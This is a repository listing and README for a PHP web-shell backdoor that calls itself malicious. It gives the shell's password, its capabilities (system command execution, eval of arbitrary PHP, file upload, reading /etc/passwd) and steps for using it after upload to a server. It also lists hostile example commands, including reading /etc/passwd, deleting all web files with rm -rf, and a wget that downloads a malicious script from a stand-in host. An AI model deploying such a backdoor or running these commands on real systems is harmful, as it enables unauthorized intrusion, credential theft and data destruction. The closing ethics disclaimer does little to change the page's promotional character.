https://github.com/rootshelll/rootkit-shell

This article analyzes the PHP RootKit Backdoor, explaining its features like password-protected access, command execution, file management, and PHP code execution. Learn about the security risks associated with such scripts and how ethical hackers and security researchers study them to enhance web security.
https://github.com/rootshelll/rootkit-shell

ethical-hacking eval-php hacking malicious-script php-backdoor php-shell phph rootkit-php shell-exec shell-script unauthorized-access web-security

Last synced: about 2 months ago
JSON representation

This article analyzes the PHP RootKit Backdoor, explaining its features like password-protected access, command execution, file management, and PHP code execution. Learn about the security risks associated with such scripts and how ethical hackers and security researchers study them to enhance web security.

• Host: GitHub
• URL: https://github.com/rootshelll/rootkit-shell
• Owner: RootShelll
• License: mit
• Created: 2025-03-12T09:30:04.000Z (about 2 months ago)
• Default Branch: main
• Last Pushed: 2025-03-12T10:10:44.000Z (about 2 months ago)
• Last Synced: 2025-03-12T10:34:56.467Z (about 2 months ago)
• Topics: ethical-hacking, eval-php, hacking, malicious-script, php-backdoor, php-shell, phph, rootkit-php, shell-exec, shell-script, unauthorized-access, web-security
• Language: PHP
• Homepage: https://r00t-shell.com/php-rootkit-backdoor-features-security-risks/
• Size: 110 KB
• Stars: 1
• Watchers: 1
• Forks: 0
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

        
### PHP RootKit Backdoor – Features & Security Risks

![RootKit-Shell Backdoor](https://raw.githubusercontent.com/RootShelll/RootKit-Shell/refs/heads/main/RootKit%20(%20PHP%20Backdoor%20).png "RootKit-Shell Backdoor")

## Password:

```bash

R00t

```

#### Overview

This PHP backdoor script provides full control over a web server once deployed. **It is a malicious tool** that allows unauthorized access and remote command execution.

#### Features & Functions:

- **Password-Protected Access:** Requires a predefined password for login.

- **File Manager:** View, create, edit, and delete files.

- **Command Execution:** Run system commands using `shell_exec()`.

- **PHP Code Execution:** Execute arbitrary PHP scripts via `eval()`.

- **File Upload:** Upload files to the server.

- **Sensitive File Access:** Read system files like `/etc/passwd`.

#### Usage (Theoretical)

Once uploaded to a server, this script can be accessed via a browser:

1. Navigate to the script URL.

2. Enter the password to gain access.

3. Execute commands, manage files, and exploit the server.

#### Example Commands:

```bash

ls -la  # List directory contents

cat /etc/passwd  # View system user accounts

rm -rf /var/www/html/*  # Delete all web files (dangerous)

wget http://malicious.com/malware.php -O /tmp/m.php  # Download a malicious script

php -r "system('whoami');"  # Check user permissions

```

#### Warning & Ethical Considerations

**Using such scripts for unauthorized access is illegal.** Ethical hackers and security researchers analyze these abilities to strengthen web security. If found on a system, **remove it immediately** and implement stronger security measures.